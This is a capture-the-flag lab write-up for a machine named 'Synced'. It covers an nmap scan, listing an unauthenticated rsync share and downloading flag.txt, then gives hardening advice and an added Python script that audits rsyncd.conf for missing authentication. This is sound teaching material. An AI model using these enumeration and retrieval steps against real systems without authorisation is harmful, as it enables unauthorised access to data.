- Machine Name: Synced
- IP Address: 10.129.239.186
- User: cywf
- NMAP Scan: I initiated the exploration with an NMAP scan to identify open ports and services on the target machine.
```
$ nmap -p- -T4 -sV 10.129.239.186
```
Results:
```
Starting Nmap 7.93 ( https://nmap.org ) at 2023-09-10 05:01 BST
Nmap scan report for 10.129.239.186
Host is up (0.070s latency).
Not shown: 65534 closed tcp ports (conn-refused)
PORT    STATE SERVICE VERSION
873/tcp open  rsync   (protocol version 31)
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 74.60 seconds
```
- RSYNC Exploration: After identifying that RSYNC was running on port 873, I proceeded to explore its shares.
First, I listed the available shares:
```
$ rsync --list-only 10.129.239.186::
```
This revealed a public share named "public".
Next, I inspected the contents of the "public" share:
```
$ rsync --list-only 10.129.239.186::public
```
I found a file named flag.txt and proceeded to retrieve it:
```
$ rsync 10.129.239.186::public/flag.txt flag.txt
```
Finally, I displayed the contents of the flag.txt file:
```
$ cat flag.txt
```
The RSYNC service on the target machine was misconfigured, allowing unauthorized access to its shares. This allowed me to access and retrieve files from the "public" share without any authentication.
- Enable Authentication: Ensure that RSYNC is running with authentication enabled. This can be achieved by setting up an rsync secrets file and configuring the rsync daemon to use it.
- Limit Access: Restrict access to the RSYNC shares to trusted IP addresses or networks using the `hosts allow` and `hosts deny` options in the `rsyncd.conf` file.
- Monitor Logs: Regularly monitor RSYNC logs for any suspicious activity or unauthorized access attempts.
- Regularly Update: Ensure that RSYNC is regularly updated to the latest version to benefit from security patches and improvements.
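
One way to check a daemon configuration against the first two recommendations, as an added example that is not part of the original write-up: the script parses an `rsyncd.conf` and reports modules with no `auth users`/`secrets file` or no `hosts allow`/`hosts deny` restriction. The sample configuration, module names, paths and user name are constructed for illustration; the target's real configuration is not shown on this page.

```python
# Added example: flag rsyncd.conf modules that allow anonymous or unrestricted access.
# SAMPLE_CONF is constructed for illustration; it is not the target's actual config.
SAMPLE_CONF = """\
[public]
    path = /srv/public
    read only = yes

[backups]
    path = /srv/backups
    auth users = backupsvc
    secrets file = /etc/rsyncd.secrets
    hosts allow = 10.0.0.0/24
    hosts deny = *
"""

def parse_rsyncd_conf(text):
    """Return (globals, {module: params}); '\\' continuations and &include are not handled."""
    globals_, modules = {}, {}
    current = globals_  # parameters before the first [module] are global
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        if line.startswith("[") and line.endswith("]"):
            current = modules.setdefault(line[1:-1].strip(), {})
        elif "=" in line:
            key, value = line.split("=", 1)  # only the first '=' is significant
            current["".join(key.split()).lower()] = value.strip()
    return globals_, modules

def audit(text):
    """Return {module: [findings]}; global values act as per-module defaults."""
    globals_, modules = parse_rsyncd_conf(text)
    report = {}
    for name, params in modules.items():
        eff = {**globals_, **params}
        findings = []
        if not eff.get("authusers"):
            findings.append("no auth users: anonymous access")
        elif not eff.get("secretsfile"):
            findings.append("auth users set without secrets file")
        if not (eff.get("hostsallow") or eff.get("hostsdeny")):
            findings.append("no hosts allow/deny restriction")
        if eff.get("readonly", "yes").lower() in ("no", "false", "0"):
            findings.append("module is writable")
        report[name] = findings
    return report

if __name__ == "__main__":
    print(audit(SAMPLE_CONF))
```

In the constructed sample, the `public` module is reported for anonymous access and missing host restrictions, while `backups` passes all checks.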